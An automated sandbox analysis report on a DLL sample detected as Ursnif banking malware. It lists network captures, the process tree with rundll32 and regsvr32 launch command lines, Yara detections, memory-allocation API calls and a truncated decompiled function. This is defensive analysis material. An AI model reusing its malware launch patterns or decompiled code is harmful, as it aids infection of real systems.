Jun 3, 2021 21:01:05.035670996 CEST	7751	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jun 3, 2021 20:58:51.820744991 CEST	104.20.185.68	443	192.168.2.4	49746	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:58:51.820744991 CEST	104.20.185.68	443	192.168.2.4	49746	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:58:51.824202061 CEST	104.20.185.68	443	192.168.2.4	49747	CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Fri Feb 12 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020	Sat Feb 12 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:58:51.824202061 CEST	104.20.185.68	443	192.168.2.4	49747	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.634355068 CEST	87.248.118.22	443	192.168.2.4	49758	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon May 03 02:00:00 CEST 2021 Tue Oct 22 14:00:00 CEST 2013	Thu Jun 24 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.634355068 CEST	87.248.118.22	443	192.168.2.4	49758	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.634839058 CEST	87.248.118.22	443	192.168.2.4	49759	CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon May 03 02:00:00 CEST 2021 Tue Oct 22 14:00:00 CEST 2013	Thu Jun 24 01:59:59 CEST 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.634839058 CEST	87.248.118.22	443	192.168.2.4	49759	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.948992968 CEST	151.101.1.44	443	192.168.2.4	49760	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.948992968 CEST	151.101.1.44	443	192.168.2.4	49760	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.949831963 CEST	151.101.1.44	443	192.168.2.4	49761	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.949831963 CEST	151.101.1.44	443	192.168.2.4	49761	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.950283051 CEST	151.101.1.44	443	192.168.2.4	49762	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jun 3, 2021 20:59:09.950283051 CEST	151.101.1.44	443	192.168.2.4	49762	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 7132 Parent PID: 5888

General

Start time:	20:58:31
Start date:	03/06/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\1.dll'
Imagebase:	0x1060000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1021984816.00000000037F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1021661815.00000000037F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1021969620.00000000037F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1021951611.00000000037F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1021715602.00000000037F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.789858287.0000000000AB0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1021915260.00000000037F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1021871881.00000000037F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1021806353.00000000037F8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7148 Parent PID: 7132

General

Start time:	20:58:32
Start date:	03/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\1.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 7160 Parent PID: 7132

General

Start time:	20:58:32
Start date:	03/06/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\1.dll
Imagebase:	0x1090000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.784548777.0000000000AD0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.834584319.0000000005298000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.1069724529.0000000005298000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.834728970.0000000005298000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.1097599278.0000000005298000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.834525873.0000000005298000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.834645544.0000000005298000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.834791862.0000000005298000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.834491785.0000000005298000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.834773952.0000000005298000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.834682087.0000000005298000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6044 Parent PID: 7148

General

Start time:	20:58:32
Start date:	03/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\1.dll',#1
Imagebase:	0xf60000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.924061110.00000000052C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.924111198.00000000052C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.924023449.00000000052C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.923759658.00000000052C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.923586250.00000000052C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.923924528.00000000052C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.784546208.0000000000960000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.923995924.00000000052C8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.924095906.00000000052C8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6300 Parent PID: 7132

General

Start time:	20:58:33
Start date:	03/06/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff77a1e0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4240 Parent PID: 7132

General

Start time:	20:58:33
Start date:	03/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\1.dll,DllRegisterServer
Imagebase:	0xf60000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.948292780.0000000004E98000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.948361474.0000000004E98000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.948383297.0000000004E98000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.948140417.0000000004E98000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.948411963.0000000004E98000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.948218371.0000000004E98000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.948264474.0000000004E98000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.785832858.0000000000410000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.948327739.0000000004E98000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 588 Parent PID: 6300

General

Start time:	20:58:34
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17410 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4488 Parent PID: 6300

General

Start time:	20:59:56
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17428 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5452 Parent PID: 6300

General

Start time:	21:00:20
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17436 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6820 Parent PID: 6300

General

Start time:	21:00:39
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17444 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5832 Parent PID: 6300

General

Start time:	21:00:42
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17452 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 684 Parent PID: 6300

General

Start time:	21:00:50
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17460 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5408 Parent PID: 6300

General

Start time:	21:01:01
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17464 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 7120 Parent PID: 6300

General

Start time:	21:01:05
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83012 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 6432 Parent PID: 6300

General

Start time:	21:01:13
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17482 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 1836 Parent PID: 6300

General

Start time:	21:01:24
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17490 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 2740 Parent PID: 6300

General

Start time:	21:01:25
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83032 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 4588 Parent PID: 6300

General

Start time:	21:01:27
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17512 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 6980 Parent PID: 6300

General

Start time:	21:01:36
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17520 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 5128 Parent PID: 6300

General

Start time:	21:01:47
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17528 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 6772 Parent PID: 6300

General

Start time:	21:01:47
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:83064 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: iexplore.exe PID: 6956 Parent PID: 6300

General

Start time:	21:01:58
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6300 CREDAT:17542 /prefetch:2
Imagebase:	0xf20000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 7132 Parent PID: 5888 loaddll32.exeCOMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	26.8%
Signature Coverage:	9.7%
Total number of Nodes:	589
Total number of Limit Nodes:	30

Executed Functions

Function 6D50B242, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000009B2,00003000,00000040,000009B2,6D50AC98), ref: 6D50B2FC
VirtualAlloc.KERNEL32(00000000,000000D7,00003000,00000040,6D50ACFB), ref: 6D50B333
VirtualAlloc.KERNEL32(00000000,00014ED4,00003000,00000040), ref: 6D50B393
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D50B3C9
VirtualProtect.KERNEL32(6D4A0000,00000000,00000004,6D50B221), ref: 6D50B4CE
VirtualProtect.KERNEL32(6D4A0000,00001000,00000004,6D50B221), ref: 6D50B4F5
VirtualProtect.KERNEL32(00000000,?,00000002,6D50B221), ref: 6D50B5C2
VirtualProtect.KERNEL32(00000000,?,00000002,6D50B221,?), ref: 6D50B618
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D50B634

Memory Dump Source

Source File: 00000000.00000002.1096943684.000000006D50A000.00000040.00020000.sdmp, Offset: 6D50A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d50a000_loaddll32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 94db6ec75e7b3355c8b79fe8e1073f7e0b9c5fcc91065ff0fda1bf8dbaf2fb05
Instruction ID: bdba57c5292f3e119830b62cd7a1019b3e19645a0c61d74e42252049a46fec1f
Opcode Fuzzy Hash: 94db6ec75e7b3355c8b79fe8e1073f7e0b9c5fcc91065ff0fda1bf8dbaf2fb05
Instruction Fuzzy Hash: 2BD148725002019FDB25EF58C8C0E6277B6FFAD314B1A4994EE2DAF75AD630A9118F60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A1979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E6D4A1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6D4A2210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6d4a41d0;
				_push(_t15 + 0x6d4a505e);
